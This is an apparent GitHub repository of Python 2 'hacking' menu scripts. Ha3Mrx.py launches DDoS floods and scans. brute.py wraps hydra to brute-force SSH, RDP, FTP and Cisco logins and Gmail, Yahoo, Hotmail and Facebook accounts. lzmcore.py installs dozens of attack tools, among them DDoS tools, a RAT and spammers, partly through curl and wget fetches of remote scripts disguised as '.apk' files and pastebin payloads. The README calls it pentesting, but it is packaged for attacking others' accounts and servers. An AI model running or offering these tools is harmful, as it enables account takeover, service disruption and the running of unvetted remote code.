├── Ha3Mrx.py ├── README.md ├── brute.py ├── core ├── __init__.py ├── __init__.pyc ├── lzmcore.py └── lzmcore.pyc ├── install.sh └── lazymux.py /Ha3Mrx.py: -------------------------------------------------------------------------------- 1 | import os, sys, time 2 | from time import sleep as timeout 3 | def restart_program(): 4 | python = sys.executable 5 | os.execl(python, python, * sys.argv) 6 | curdir = os.getcwd() 7 | os.system("clear") 8 | os.system("figlet Ha3MrX") 9 | print "Create By : Ha3MrX" 10 | print "YouTube : https://www.youtube.com/c/HA-MRX" 11 | print "github : https://github.com/Ha3MrX" 12 | print "Website : https://kurdkali.wordpress.com/" 13 | print " [1]> Brute Force " 14 | print " [2]> DDos Attack " 15 | print " [3]> NMap PortScanner " 16 | print " [4]> Install Tools Hacking " 17 | print 18 | print " [0]> Exit " 19 | print 20 | A = raw_input("Ha3MrX ==>> ") 21 | 22 | if A == "1" or A == "01": 23 | os.system("python2 brute.py") 24 | 25 | elif A == "2" or A == "02": 26 | os.system("clear") 27 | os.system("figlet DDOS Attack") 28 | ip = raw_input("IP Address : ") 29 | port = raw_input("Port : ") 30 | packet =raw_input("Packet : ") 31 | os.system("python2 pntddos %s %s %s" % (ip, port, packet)) 32 | 33 | elif A == "3" or A == "03": 34 | os.system("clear") 35 | os.system("figlet NMap Scan") 36 | host = raw_input("Host : ") 37 | os.system("nmap %s" % (host)) 38 | 39 | elif A == "4" or A == "04": 40 | os.system("python2 lazymux.py") 41 | 42 | elif A == "0" or A == "00": 43 | sys.exit() 44 | 45 | else: 46 | print "\nERROR: Wrong Input" 47 | timeout(3) 48 | restart_program() 49 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Hacking 2 | 3 | ### Ha3Mrx Pentesting and Security Hacking 4 | 5 | ### Best Hacking Tools 6 | 7 | ### A penetration test, or pen-test, is an attempt to evaluate the security of an IT infrastructure by safely trying to exploit vulnerabilities. These vulnerabilities may exist in operating systems, services and application flaws, improper configurations or risky end-user behavior. Such assessments are also useful in validating the efficacy of defensive mechanisms, as well as, end-user adherence to security policies 8 | 9 | ### Download&Install 10 | 11 | # git clone https://github.com/Ha3MrX/Hacking 12 | 13 | #### cd Hacking 14 | 15 | #### chmod +x install.sh 16 | 17 | #### ./install.sh 18 | 19 | #### chmod +x Ha3Mrx.py 20 | 21 | #### python2 Ha3Mrx.py 22 | 23 | ### ScreenShot 24 | 25 | ![capture2](https://user-images.githubusercontent.com/33704360/38951953-f9f668d0-42fe-11e8-9901-6bcc7b5feb61.PNG) 26 | 27 | ![capture3](https://user-images.githubusercontent.com/33704360/38951965-02227fe4-42ff-11e8-9a2d-592084ba9c01.PNG) 28 | 29 | ### YouTube Channel 30 | 31 | https://www.youtube.com/channel/UCCgy7i_A5yhAEdY86rPOinA 32 | 33 | ### Viddeo Tutorials 34 | 35 | https://www.youtube.com/watch?v=5Io63aB3gs0 36 | -------------------------------------------------------------------------------- /brute.py: -------------------------------------------------------------------------------- 1 | import os, sys, time 2 | from time import sleep as timeout 3 | def restart_program(): 4 | python = sys.executable 5 | os.execl(python, python, * sys.argv) 6 | curdir = os.getcwd() 7 | os.system("clear") 8 | os.system("figlet Brute Force") 9 | print 10 | print " [01]> Cisco Brute Force " 11 | print " [02]> VNC Brute Force " 12 | print " [03]> FTP Brute Force " 13 | print " [04]> Gmail Brute Force " 14 | print " [05]> SSH Brute Force " 15 | print " [06]> TeamSpeak Brute Force " 16 | print " [07]> Telnet Brute Force " 17 | print " [08]> Yahoo Mail Brute Force " 18 | print " [09]> Hotmail Brute Force " 19 | print " [10]> Router Speedy Brute Force " 20 | print " [11]> RDP Brute Force " 21 | print " [12]> MySQL Brute Force " 22 | print " [13]> Facebook Brute Force " 23 | print 24 | print " [00]> Exit" 25 | print 26 | bhydra = raw_input("Brute Force Console ==>> ") 27 | 28 | if bhydra == '01' or bhydra == '1': 29 | os.system("clear") 30 | os.system("figlet Cisco Brute Force ") 31 | iphost = raw_input("[*] IP/Hostname : ") 32 | word = raw_input("[*] Wordlist : ") 33 | os.system("hydra -P %s %s cisco" % (word, iphost)) 34 | sys.exit() 35 | 36 | elif bhydra == '02' or bhydra == '2': 37 | os.system("clear") 38 | os.system("figlet VNC Brute Force") 39 | word = raw_input("[*] Wordlist : ") 40 | iphost = raw_input("[*] IP/Hostname : ") 41 | os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) 42 | iphost = raw_input("[*] IP/Hostname : ") 43 | 44 | elif bhydra == '03' or bhydra == '3': 45 | os.system("figlet FTP Brute Force") 46 | user = raw_input("[*] User : ") 47 | iphost = raw_input("[*] IP/Hostname : ") 48 | word = raw_input("[*] Wordlist : ") 49 | os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) 50 | sys.exit() 51 | 52 | elif bhydra == '04' or bhydra == '4': 53 | os.system("clear") 54 | os.system("figlet Gmail Brute Force") 55 | email = raw_input("[*] Email : ") 56 | word = raw_input("[*] Wordlist : ") 57 | os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) 58 | sys.exit() 59 | 60 | elif bhydra == '05' or bhydra == '5': 61 | os.system("clear") 62 | os.system("figlet SSH Brute Force") 63 | user = raw_input("[*] User : ") 64 | word = raw_input("[*] Wordlist : ") 65 | iphost = raw_input("[*] IP/Hostname : ") 66 | os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) 67 | sys.exit() 68 | 69 | elif bhydra == '06' or bhydra == '6': 70 | os.system("clear") 71 | os.system("figlet TeamSpeak Brute Force") 72 | user = raw_input("[*] User : ") 73 | word = raw_input("[*] Wordlist : ") 74 | iphost = raw_input("[*] IP/Hostname : ") 75 | os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) 76 | sys.exit() 77 | 78 | elif bhydra == '07' or bhydra == '7': 79 | os.system("clear") 80 | os.system("figlet Telnet Brute Force") 81 | user = raw_input("[*] User : ") 82 | word = raw_input("[*] Wordlist : ") 83 | iphost = raw_input("[*] IP/Hostname : ") 84 | os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) 85 | sys.exit() 86 | 87 | elif bhydra == '08' or bhydra == '8': 88 | os.system("clear") 89 | os.system("Yahoo Brute Force") 90 | email = raw_input("[*] Email : ") 91 | word = raw_input("[*] Wordlist : ") 92 | os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) 93 | sys.exit() 94 | 95 | elif bhydra == '09' or bhydra == '9': 96 | os.system("clear") 97 | os.system("figlet Hotmail Brute Force") 98 | email = raw_input("[*] Email : ") 99 | word = raw_input("[*] Wordlist : ") 100 | os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) 101 | sys.exit() 102 | 103 | elif bhydra == '10': 104 | os.system("clear") 105 | os.system("figlet Router Speedy Brute Force") 106 | user = raw_input("[*] User : ") 107 | word = raw_input("[*] Wordlist : ") 108 | iphost = raw_input("[*] IP/Hostname : ") 109 | os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) 110 | sys.exit() 111 | 112 | elif bhydra == '11': 113 | os.system("clear") 114 | os.system("figlet PDR Brute Force") 115 | user = raw_input("[*] User : ") 116 | word = raw_input("[*] Wordlist : ") 117 | iphost = raw_input("[*] IP/Hostname : ") 118 | os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) 119 | sys.exit() 120 | 121 | elif bhydra == '12': 122 | os.syatem("clear") 123 | os.system("figlet My SQL Brute Force") 124 | user = raw_input("[*] User : ") 125 | word = raw_input("[*] Wordlist : ") 126 | os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) 127 | 128 | elif bhydra == "13": 129 | os.system("clear") 130 | os.system("figlet Facebook Brute Force") 131 | os.system("python2 facebook") 132 | 133 | 134 | elif bhydra == '00' or bhydra == '0': 135 | os.system("python2 Ha3MrX.py") 136 | 137 | else: 138 | print "\n[!] ERROR : Wrong Input" 139 | time.sleep(1) 140 | restart_program() 141 | -------------------------------------------------------------------------------- /core/__init__.py: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /core/__init__.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Ha3MrX/Hacking/6f627008fcd072278ae3041b19d540b86577b2e6/core/__init__.pyc -------------------------------------------------------------------------------- /core/lzmcore.py: -------------------------------------------------------------------------------- 1 | ## lzmcore.py - useful module of Lazymux 2 | # -*- coding: utf-8 -*- 3 | import os 4 | import sys 5 | import time 6 | 7 | lazymux_banner = """ 8 | .-. 9 | : : 10 | : : .--. .---. .-..-.,-.,-.,-..-..-..-.,-. 11 | : :__ ' .; ; `-'_.': :; :: ,. ,. :: :; :`. .' 12 | :___.'`.__,_;`.___;`._. ;:_;:_;:_;`.__.':_,._; 13 | .-. : 14 | `._.' 15 | """ 16 | backtomenu_banner = """ 17 | [99] Back to main menu 18 | [00] Exit the Lazymux 19 | """ 20 | def restart_program(): 21 | python = sys.executable 22 | os.execl(python, python, * sys.argv) 23 | curdir = os.getcwd() 24 | 25 | def backtomenu_option(): 26 | print backtomenu_banner 27 | backtomenu = raw_input("lzmx > ") 28 | 29 | if backtomenu == "99": 30 | restart_program() 31 | elif backtomenu == "00": 32 | sys.exit() 33 | else: 34 | print "\nERROR: Wrong Input" 35 | time.sleep(2) 36 | restart_program() 37 | 38 | def banner(): 39 | print lazymux_banner 40 | 41 | def nmap(): 42 | print '\n###### Installing Nmap' 43 | os.system('apt update && apt upgrade') 44 | os.system('apt install nmap') 45 | print '###### Done' 46 | print "###### Type 'nmap' to start." 47 | backtomenu_option() 48 | 49 | def red_hawk(): 50 | print '\n###### Installing RED HAWK' 51 | os.system('apt update && apt upgrade') 52 | os.system('apt install git php') 53 | os.system('git clone https://github.com/Tuhinshubhra/RED_HAWK') 54 | os.system('mv RED_HAWK ~') 55 | print '###### Done' 56 | backtomenu_option() 57 | 58 | def dtect(): 59 | print '\n###### Installing D-Tect' 60 | os.system('apt update && apt upgrade') 61 | os.system('apt install python2 git') 62 | os.system('git clone https://github.com/shawarkhanethicalhacker/D-TECT') 63 | os.system('mv D-TECT ~') 64 | print '###### Done' 65 | backtomenu_option() 66 | 67 | def sqlmap(): 68 | print '\n###### Installing sqlmap' 69 | os.system('apt update && apt upgrade') 70 | os.system('apt install git python2') 71 | os.system('git clone https://github.com/sqlmapproject/sqlmap') 72 | os.system('mv sqlmap ~') 73 | print '###### Done' 74 | backtomenu_option() 75 | 76 | def infoga(): 77 | print '\n###### Installing Infoga' 78 | os.system('apt update && apt upgrade') 79 | os.system('apt install python2 git') 80 | os.system('pip2 install requests urllib3 urlparse') 81 | os.system('git clone https://github.com/m4ll0k/Infoga') 82 | os.system('mv Infoga ~') 83 | print '###### Done' 84 | backtomenu_option() 85 | 86 | def reconDog(): 87 | print '\n###### Installing ReconDog' 88 | os.system('apt update && apt upgrade') 89 | os.system('apt install python2 git') 90 | os.system('git clone https://github.com/UltimateHackers/ReconDog') 91 | os.system('mv ReconDog ~') 92 | print '###### Done' 93 | backtomenu_option() 94 | 95 | def androZenmap(): 96 | print '\n###### Installing AndroZenmap' 97 | os.system('apt update && apt upgrade') 98 | os.system('apt install nmap curl') 99 | os.system('curl -O http://override.waper.co/files/androzenmap.txt') 100 | os.system('mkdir ~/AndroZenmap') 101 | os.system('mv androzenmap.txt ~/AndroZenmap/androzenmap.sh') 102 | print '###### Done' 103 | backtomenu_option() 104 | 105 | def sqlmate(): 106 | print '\n###### Installing sqlmate' 107 | os.system('apt update && apt upgrade') 108 | os.system('apt install python2 git') 109 | os.system('pip2 install mechanize bs4 HTMLparser argparse requests urlparse2') 110 | os.system('git clone https://github.com/UltimateHackers/sqlmate') 111 | os.system('mv sqlmate ~') 112 | print '###### Done' 113 | backtomenu_option() 114 | 115 | def astraNmap(): 116 | print '\n###### Installing AstraNmap' 117 | os.system('apt update && apt upgrade') 118 | os.system('apt install git nmap') 119 | os.system('git clone https://github.com/Gameye98/AstraNmap') 120 | os.system('mv AstraNmap ~') 121 | print '###### Done' 122 | backtomenu_option() 123 | 124 | def wtf(): 125 | print '\n###### Installing WTF' 126 | os.system('apt update && apt upgrade') 127 | os.system('apt install git python2') 128 | os.system('pip2 bs4 requests HTMLParser urlparse mechanize argparse') 129 | os.system('git clone https://github.com/Xi4u7/wtf') 130 | os.system('mv wtf ~') 131 | print '###### Done' 132 | backtomenu_option() 133 | 134 | def easyMap(): 135 | print '\n###### Installing Easymap' 136 | os.system('apt update && apt upgrade') 137 | os.system('apt install php git') 138 | os.system('git clone https://github.com/Cvar1984/Easymap') 139 | os.system('mv Easymap ~') 140 | os.system('cd ~/Easymap && sh install.sh') 141 | print '###### Done' 142 | backtomenu_option() 143 | 144 | def xd3v(): 145 | print '\n###### Installing XD3v' 146 | os.system('apt update && apt upgrade') 147 | os.system('apt install curl') 148 | os.system('curl -k -O https://gist.github.com/Gameye98/92035588bd0228df6fb7fa77a5f26bc2/raw/f8e73cd3d9f2a72bd536087bb6ba7bc8baef7d1d/xd3v.sh') 149 | os.system('mv xd3v.sh ~/../usr/bin/xd3v && chmod +x ~/../usr/bin/xd3v') 150 | print '###### Done' 151 | print "###### Type 'xd3v' to start." 152 | backtomenu_option() 153 | 154 | def crips(): 155 | print '\n###### Installing Crips' 156 | os.system("apt update && apt upgrade") 157 | os.system("apt install git python2 openssl curl libcurl wget") 158 | os.system("git clone https://github.com/Manisso/Crips") 159 | os.system("mv Crips ~") 160 | print '###### Done' 161 | backtomenu_option() 162 | 163 | def sir(): 164 | print '\n###### Installing SIR' 165 | os.system("apt update && apt upgrade") 166 | os.system("apt install python2 git") 167 | os.system("pip2 install bs4 urllib2") 168 | os.system("git clone https://github.com/AeonDave/sir.git") 169 | os.system("mv sir ~") 170 | print '###### Done' 171 | backtomenu_option() 172 | 173 | def xshell(): 174 | print '\n###### Installing Xshell' 175 | os.system("apt update && apt upgrade") 176 | os.system("apt install lynx python2 figlet ruby php nano w3m") 177 | os.system("git clone https://github.com/Ubaii/Xshell") 178 | os.system("mv Xshell ~") 179 | print '###### Done' 180 | backtomenu_option() 181 | 182 | def evilURL(): 183 | print '\n###### Installing EvilURL' 184 | os.system("apt update && apt upgrade") 185 | os.system("apt install git python2 python3") 186 | os.system("git clone https://github.com/UndeadSec/EvilURL") 187 | os.system("mv EvilURL ~") 188 | print '###### Done' 189 | backtomenu_option() 190 | 191 | def striker(): 192 | print '\n###### Installing Striker' 193 | os.system('apt update && apt upgrade') 194 | os.system('apt install git python2') 195 | os.system('git clone https://github.com/UltimateHackers/Striker') 196 | os.system('mv Striker ~') 197 | os.system('cd ~/Striker && pip2 install -r requirements.txt') 198 | print '###### Done' 199 | backtomenu_option() 200 | 201 | def dsss(): 202 | print '\n###### Installing DSSS' 203 | os.system('apt update && apt upgrade') 204 | os.system('apt install python2 git') 205 | os.system('git clone https://github.com/stamparm/DSSS') 206 | os.system('mv DSSS ~') 207 | print '###### Done' 208 | backtomenu_option() 209 | 210 | def sqliv(): 211 | print '\n###### Installing SQLiv' 212 | os.system('apt update && apt upgrade') 213 | os.system('apt install python2 git') 214 | os.system('git clone https://github.com/Hadesy2k/sqliv') 215 | os.system('mv sqliv ~') 216 | print '###### Done' 217 | backtomenu_option() 218 | 219 | def sqlscan(): 220 | print '\n###### Installing sqlscan' 221 | os.system('apt update && apt upgrade') 222 | os.system('apt install git php') 223 | os.system('git clone http://www.github.com/Cvar1984/sqlscan') 224 | os.system('mv sqlscan ~') 225 | print '###### Done' 226 | backtomenu_option() 227 | 228 | def wordpreSScan(): 229 | print '\n###### Installing Wordpresscan' 230 | os.system('apt update && apt upgrade') 231 | os.system('apt install python2 python2-dev clang libxml2-dev libxml2-utils libxslt-dev') 232 | os.system('git clone https://github.com/swisskyrepo/Wordpresscan') 233 | os.system('mv Wordpresscan ~') 234 | os.system('cd ~/Wordpresscan && pip2 install -r requirements.txt') 235 | print '###### Done' 236 | backtomenu_option() 237 | 238 | def wpscan(): 239 | print '\n###### Installing WPScan' 240 | os.system('apt update && apt upgrade') 241 | os.system('apt install git ruby curl') 242 | os.system('git clone https://github.com/wpscanteam/wpscan') 243 | os.system('mv wpscan ~ && cd ~/wpscan') 244 | os.system('gem install bundle && bundle config build.nokogiri --use-system-libraries && bundle install && ruby wpscan.rb --update') 245 | print '###### Done' 246 | backtomenu_option() 247 | 248 | def wordpresscan(): 249 | print '\n###### Installing wordpresscan(2)' 250 | os.system('apt update && apt upgrade') 251 | os.system('apt install nmap figlet git') 252 | os.system('git clone https://github.com/silverhat007/termux-wordpresscan') 253 | os.system('cd termux-wordpresscan && chmod +x * && sh install.sh') 254 | os.system('mv termux-wordpresscan ~') 255 | print '###### Done' 256 | print "###### Type 'wordpresscan' to start." 257 | backtomenu_option() 258 | 259 | def routersploit(): 260 | print '\n###### Installing Routersploit' 261 | os.system('apt update && apt upgrade') 262 | os.system('apt install python2 git') 263 | os.system('pip2 install requests') 264 | os.system('git clone https://github.com/reverse-shell/routersploit') 265 | os.system('mv routersploit ~;cd ~/routersploit;pip2 install -r requirements.txt;termux-fix-shebang rsf.py') 266 | print '###### Done' 267 | backtomenu_option() 268 | 269 | def torshammer(): 270 | print '\n###### Installing Torshammer' 271 | os.system('apt update && apt upgrade') 272 | os.system('apt install python2 git') 273 | os.system('git clone https://github.com/dotfighter/torshammer') 274 | os.system('mv torshammer ~') 275 | print '###### Done' 276 | backtomenu_option() 277 | 278 | def slowloris(): 279 | print '\n###### Installing Slowloris' 280 | os.system('apt update && apt upgrade') 281 | os.system('apt install python2 git') 282 | os.system('git clone https://github.com/gkbrk/slowloris') 283 | os.system('mv slowloris ~') 284 | print '###### Done' 285 | backtomenu_option() 286 | 287 | def fl00d12(): 288 | print '\n###### Installing Fl00d & Fl00d2' 289 | os.system('apt update && apt upgrade') 290 | os.system('apt install python2 wget') 291 | os.system('mkdir ~/fl00d') 292 | os.system('wget http://override.waper.co/files/fl00d.apk') 293 | os.system('wget http://override.waper.co/files/fl00d2.apk') 294 | os.system('mv fl00d.apk ~/fl00d/fl00d.py;mv fl00d2.apk ~/fl00d/fl00d2.py') 295 | print '###### Done' 296 | backtomenu_option() 297 | 298 | def goldeneye(): 299 | print '\n###### Installing GoldenEye' 300 | os.system('apt update && apt upgrade') 301 | os.system('apt install git python2') 302 | os.system('git clone https://github.com/jseidl/GoldenEye') 303 | os.system('mv GoldenEye ~') 304 | print '###### Done' 305 | backtomenu_option() 306 | 307 | def xerxes(): 308 | print '\n###### Installing Xerxes' 309 | os.system('apt update && apt upgrade') 310 | os.system('apt install git') 311 | os.system('apt install clang') 312 | os.system('git clone https://github.com/zanyarjamal/xerxes') 313 | os.system('mv xerxes ~') 314 | os.system('cd ~/xerxes && clang xerxes.c -o xerxes') 315 | print '###### Done' 316 | backtomenu_option() 317 | 318 | def planetwork_ddos(): 319 | print '\n###### Installing Planetwork-DDOS' 320 | os.system('apt update && apt upgrade') 321 | os.system('apt install git python2') 322 | os.system('git clone https://github.com/Hydra7/Planetwork-DDOS') 323 | os.system('mv Planetwork-DDOS ~') 324 | print '###### Done' 325 | backtomenu_option() 326 | 327 | def hydra(): 328 | print '\n###### Installing Hydra' 329 | os.system('apt update && apt upgrade') 330 | os.system('apt install hydra') 331 | print '###### Done' 332 | backtomenu_option() 333 | 334 | def black_hydra(): 335 | print '\n###### Installing Black Hydra' 336 | os.system('apt update && apt upgrade') 337 | os.system('apt install hydra git python2') 338 | os.system('git clone https://github.com/Gameye98/Black-Hydra') 339 | os.system('mv Black-Hydra ~') 340 | print '###### Done' 341 | backtomenu_option() 342 | 343 | def cupp(): 344 | print '\n###### Installing Cupp' 345 | os.system('apt update && apt upgrade') 346 | os.system('apt install python2 git') 347 | os.system('git clone https://github.com/Mebus/cupp') 348 | os.system('mv cupp ~') 349 | print '###### Done' 350 | backtomenu_option() 351 | 352 | def leethash(): 353 | print '\n###### Installing 1337Hash' 354 | os.system('apt update && apt upgrade') 355 | os.system('apt install git python2') 356 | os.system('git clone https://github.com/Gameye98/1337Hash') 357 | os.system('mv 1337Hash ~') 358 | print '###### Done' 359 | backtomenu_option() 360 | 361 | def hash_buster(): 362 | print '\n###### Installing Hash-Buster' 363 | os.system('apt update && apt upgrade') 364 | os.system('apt install python2 git') 365 | os.system('git clone https://github.com/UltimateHackers/Hash-Buster') 366 | os.system('mv Hash-Buster ~') 367 | print '###### Done' 368 | backtomenu_option() 369 | 370 | def instaHack(): 371 | print '\n###### Installing InstaHack' 372 | os.system('apt update && apt upgrade') 373 | os.system('apt install python2 git') 374 | os.system('pip2 install requests') 375 | os.system('git clone https://github.com/avramit/instahack') 376 | os.system('mv instahack ~') 377 | print '###### Done' 378 | backtomenu_option() 379 | 380 | def indonesian_wordlist(): 381 | print '\n###### Installing indonesian-wordlist' 382 | os.system('apt update && apt upgrade') 383 | os.system('apt install git') 384 | os.system('git clone https://github.com/geovedi/indonesian-wordlist') 385 | os.system('mv indonesian-wordlist ~') 386 | print '###### Done' 387 | backtomenu_option() 388 | 389 | def facebook_bruteForce(): 390 | print '\n###### Installing Facebook Brute Force' 391 | os.system('apt update && apt upgrade') 392 | os.system('apt install python2 wget') 393 | os.system('pip2 install mechanize') 394 | os.system('mkdir ~/facebook-brute') 395 | os.system('wget http://override.waper.co/files/facebook.apk') 396 | os.system('wget http://override.waper.co/files/password.apk') 397 | os.system('mv facebook.apk ~/facebook-brute/facebook.py;mv password.apk ~/facebook-brute/password.txt') 398 | print '###### Done' 399 | backtomenu_option() 400 | 401 | def facebook_BruteForce(): 402 | print '\n###### Installing Facebook Brute Force 2' 403 | os.system('apt update && apt upgrade') 404 | os.system('apt install wget python2') 405 | os.system('pip2 install mechanize') 406 | os.system('wget http://override.waper.co/files/facebook2.apk') 407 | os.system('wget http://override.waper.co/files/password.apk') 408 | os.system('mkdir ~/facebook-brute-2') 409 | os.system('mv facebook2.apk ~/facebook-brute-2/facebook2.py && mv password.apk ~/facebook-brute-2/password.txt') 410 | print '###### Done' 411 | backtomenu_option() 412 | 413 | def fbBrute(): 414 | print '\n###### Installing Facebook Brute Force 3' 415 | os.system('apt update && apt upgrade') 416 | os.system('apt install wget python2') 417 | os.system('pip2 install mechanize') 418 | os.system('wget http://override.waper.co/files/facebook3.apk') 419 | os.system('wget http://override.waper.co/files/password.apk') 420 | os.system('mkdir ~/facebook-brute-3') 421 | os.system('mv facebook3.apk ~/facebook-brute-3/facebook3.py && mv password.apk ~/facebook-brute-3/password.txt') 422 | print '###### Done' 423 | backtomenu_option() 424 | 425 | def webdav(): 426 | print '\n###### Installing Webdav' 427 | os.system('apt update && apt upgrade') 428 | os.system('apt install python2 openssl curl libcurl') 429 | os.system('pip2 install urllib3 chardet certifi idna requests') 430 | os.system('mkdir ~/webdav') 431 | os.system('curl -k -O http://override.waper.co/files/webdav.txt;mv webdav.txt ~/webdav/webdav.py') 432 | print '###### Done' 433 | backtomenu_option() 434 | 435 | def xGans(): 436 | print '\n###### Installing xGans' 437 | os.system('apt update && apt upgrade') 438 | os.system('apt install python2 curl') 439 | os.system('mkdir ~/xGans') 440 | os.system('curl -O http://override.waper.co/files/xgans.txt') 441 | os.system('mv xgans.txt ~/xGans/xgans.py') 442 | print '###### Done' 443 | backtomenu_option() 444 | 445 | def webmassploit(): 446 | print '\n###### Installing Webdav Mass Exploiter' 447 | os.system("apt update && apt upgrade") 448 | os.system("apt install python2 openssl curl libcurl") 449 | os.system("pip2 install requests") 450 | os.system("curl -k -O https://pastebin.com/raw/K1VYVHxX && mv K1VYVHxX webdav.py") 451 | os.system("mkdir ~/webdav-mass-exploit && mv webdav.py ~/webdav-mass-exploit") 452 | print '###### Done' 453 | backtomenu_option() 454 | 455 | def wpsploit(): 456 | print '\n###### Installing WPSploit' 457 | os.system('apt update && apt upgrade') 458 | os.system('apt install python2 git') 459 | os.system('git clone git clone https://github.com/m4ll0k/wpsploit') 460 | os.system('mv wpsploit ~') 461 | print '###### Done' 462 | backtomenu_option() 463 | 464 | def sqldump(): 465 | print '\n###### Installing sqldump' 466 | os.system('apt update && apt upgrade') 467 | os.system('apt install python2 curl') 468 | os.system('pip2 install google') 469 | os.system('curl -k -O https://gist.githubusercontent.com/Gameye98/76076c9a282a6f32749894d5368024a6/raw/6f9e754f2f81ab2b8efda30603dc8306c65bd651/sqldump.py') 470 | os.system('mkdir ~/sqldump && chmod +x sqldump.py && mv sqldump.py ~/sqldump') 471 | print '###### Done' 472 | backtomenu_option() 473 | 474 | def websploit(): 475 | print '\n###### Installing Websploit' 476 | os.system('apt update && apt upgrade') 477 | os.system('apt install git python2') 478 | os.system('pip2 install scapy') 479 | os.system('git clone https://github.com/The404Hacking/websploit') 480 | os.system('mv websploit ~') 481 | print '###### Done' 482 | backtomenu_option() 483 | 484 | def sqlokmed(): 485 | print '\n###### Installing sqlokmed' 486 | os.system('apt update && apt upgrade') 487 | os.system('apt install python2 git') 488 | os.system('pip2 install urllib2') 489 | os.system('git clone https://github.com/Anb3rSecID/sqlokmed') 490 | os.system('mv sqlokmed ~') 491 | print '###### Done' 492 | backtomenu_option() 493 | 494 | def zones(): 495 | print '######' 496 | os.system("apt update && apt upgrade") 497 | os.system("apt install git php") 498 | os.system("git clone https://github.com/Cvar1984/zones") 499 | os.system("mv zones ~") 500 | print '######' 501 | backtomenu_option() 502 | 503 | def metasploit(): 504 | print '\n###### Installing Metasploit' 505 | os.system("apt update && apt upgrade") 506 | os.system("apt install git wget curl") 507 | os.system("wget https://gist.githubusercontent.com/Gameye98/d31055c2d71f2fa5b1fe8c7e691b998c/raw/09e43daceac3027a1458ba43521d9c6c9795d2cb/msfinstall.sh") 508 | os.system("mv msfinstall.sh ~;cd ~;sh msfinstall.sh") 509 | print '###### Done' 510 | print "###### Type 'msfconsole' to start." 511 | backtomenu_option() 512 | 513 | def commix(): 514 | print '\n###### Installing Commix' 515 | os.system('apt update && apt upgrade') 516 | os.system('apt install python2 git') 517 | os.system('git clone https://github.com/commixproject/commix') 518 | os.system('mv commix ~') 519 | print '###### Done' 520 | backtomenu_option() 521 | 522 | def brutal(): 523 | print '\n###### Installing Brutal' 524 | os.system('apt update && apt upgrade') 525 | os.system('apt install git') 526 | os.system('git clone https://github.com/Screetsec/Brutal') 527 | os.system('mv Brutal ~') 528 | print '###### Done' 529 | backtomenu_option() 530 | 531 | def a_rat(): 532 | print '\n###### Installing A-Rat' 533 | os.system('apt update && apt upgrade') 534 | os.system('apt install python2 git') 535 | os.system('git clone https://github.com/Xi4u7/A-Rat') 536 | os.system('mv A-Rat ~') 537 | print '###### Done' 538 | backtomenu_option() 539 | 540 | def knockmail(): 541 | print '\n###### Installing KnockMail' 542 | os.system('apt update && apt upgrade') 543 | os.system('apt install python2 git') 544 | os.system('pip2 install validate_email pyDNS') 545 | os.system('git clone https://github.com/4w4k3/KnockMail') 546 | os.system('mv KnockMail ~') 547 | print '###### Done' 548 | backtomenu_option() 549 | 550 | def spammer_grab(): 551 | print '\n###### Installing Spammer-Grab' 552 | os.system('apt update && apt upgrade') 553 | os.system('apt install python2 git && pip2 install requests') 554 | os.system('git clone https://github.com/p4kl0nc4t/spammer-grab') 555 | os.system('mv spammer-grab ~') 556 | print '###### Done' 557 | backtomenu_option() 558 | 559 | def hac(): 560 | print '\n###### Installing Hac' 561 | os.system('apt update && apt upgrade') 562 | os.system('apt install php git') 563 | os.system('git clone https://github.com/Cvar1984/Hac') 564 | os.system('mv Hac ~') 565 | print '###### Done' 566 | backtomenu_option() 567 | 568 | def spammer_email(): 569 | print '\n###### Installing Spammer-Email' 570 | os.system("apt update && apt upgrade") 571 | os.system("apt install git python2 && pip2 install argparse requests") 572 | os.system("git clone https://github.com/p4kl0nc4t/Spammer-Email") 573 | os.system("mv Spammer-Email ~") 574 | print '###### Done' 575 | backtomenu_option() 576 | 577 | def rang3r(): 578 | print '\n###### Installing Rang3r' 579 | os.system("apt update && apt upgrade") 580 | os.system("apt install git python2 && pip2 install optparse termcolor") 581 | os.system("git clone https://github.com/floriankunushevci/rang3r") 582 | os.system("mv rang3r ~") 583 | print '###### Done' 584 | backtomenu_option() 585 | 586 | def sh33ll(): 587 | print '\n###### Installing SH33LL' 588 | os.system("apt update && apt upgrade") 589 | os.system("apt install git python2") 590 | os.system("git clone https://github.com/LOoLzeC/SH33LL") 591 | os.system("mv SH33LL ~") 592 | print '###### Done' 593 | backtomenu_option() 594 | 595 | def social(): 596 | print '\n###### Installing Social-Engineering' 597 | os.system("apt update && apt upgrade") 598 | os.system("apt install python2 perl") 599 | os.system("git clone https://github.com/LOoLzeC/social-engineering") 600 | os.system("mv social-engineering ~") 601 | print '###### Done' 602 | backtomenu_option() 603 | 604 | def spiderbot(): 605 | print '\n###### Installing SpiderBot' 606 | os.system("apt update && apt upgrade") 607 | os.system("apt install git php") 608 | os.system("git clone https://github.com/Cvar1984/SpiderBot") 609 | os.system("mv SpiderBot ~") 610 | print '###### Done' 611 | backtomenu_option() 612 | 613 | def ngrok(): 614 | print '\n###### Installing Ngrok' 615 | os.system('apt update && apt upgrade') 616 | os.system('apt install git') 617 | os.system('git clone https://github.com/themastersunil/ngrok') 618 | os.system('mv ngrok ~') 619 | print '###### Done' 620 | backtomenu_option() 621 | 622 | def sudo(): 623 | print '\n###### Installing sudo' 624 | os.system('apt update && apt upgrade') 625 | os.system('apt install ncurses-utils git') 626 | os.system('git clone https://github.com/st42/termux-sudo') 627 | os.system('mv termux-sudo ~ && cd ~/termux-sudo && chmod 777 *') 628 | os.system('cat sudo > /data/data/com.termux/files/usr/bin/sudo') 629 | os.system('chmod 700 /data/data/com.termux/files/usr/bin/sudo') 630 | print '###### Done' 631 | backtomenu_option() 632 | 633 | 